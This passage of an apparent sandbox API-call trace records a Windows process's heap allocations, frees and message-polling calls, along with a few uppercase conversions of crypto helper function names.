hHeap=0x970000) returned 1 [0128.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0128.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0128.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0128.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0128.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0128.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0128.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0128.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0128.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0128.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0128.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0128.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0128.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0128.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0128.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0128.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0128.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0128.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0128.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0128.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0128.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0128.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0128.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0128.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0128.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0128.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0128.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0128.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0128.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0128.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0128.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0128.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0128.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0128.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0128.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0128.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0128.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0128.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0128.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0128.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0128.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0128.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0128.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0128.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0128.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0128.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0128.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0128.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0128.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0128.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0128.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0128.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0128.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0128.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0128.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0128.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0128.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0128.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0128.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0128.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0128.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0128.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0128.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0128.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0128.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0128.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0128.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0128.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0128.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0128.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0128.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0128.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0128.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0128.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0128.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0128.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0128.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0128.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0128.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0128.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0128.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0128.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0128.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0128.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0128.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0128.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0128.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0128.773] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0128.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0128.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0128.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0128.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0128.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0128.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0128.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0128.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0128.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0128.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0128.773] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0128.774] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0128.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0128.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0128.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0128.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0128.774] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0128.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0128.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0128.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0128.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0128.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0128.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0128.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0128.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0128.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0128.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0128.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0128.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0128.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf900) returned 0x2ede760 [0128.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0128.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0128.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0128.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0128.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0128.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0128.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0128.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0128.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0128.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0128.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0128.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0128.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf900) returned 0x2eee068 [0128.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ede760 | out: hHeap=0x970000) returned 1 [0128.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.778] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0128.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.778] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0128.778] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0128.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0128.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0128.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0128.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0128.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.779] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0128.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0128.779] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0128.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0128.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0128.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0128.779] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0128.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe68 [0128.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0128.779] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0128.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe68 | out: hHeap=0x970000) returned 1 [0128.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0128.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0128.779] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0128.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0128.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0128.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0128.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0128.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0128.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0128.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0128.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0128.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0128.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507d0 [0128.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0128.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0128.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0128.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0128.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0128.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0128.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0128.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0128.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0128.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0128.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0128.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0128.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0128.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0128.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0128.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0128.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0128.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0128.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0128.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0128.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0128.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0128.780] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0128.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0128.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0128.780] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0128.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0128.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0128.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0128.781] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0128.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0128.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0128.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0128.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0128.781] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0128.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0128.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0128.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0128.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0128.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0128.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0128.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0128.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0128.781] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0128.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0128.781] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0128.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0128.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0128.781] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0128.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0128.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0128.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0128.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0128.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ede760 | out: hHeap=0x970000) returned 1 [0128.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0128.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: 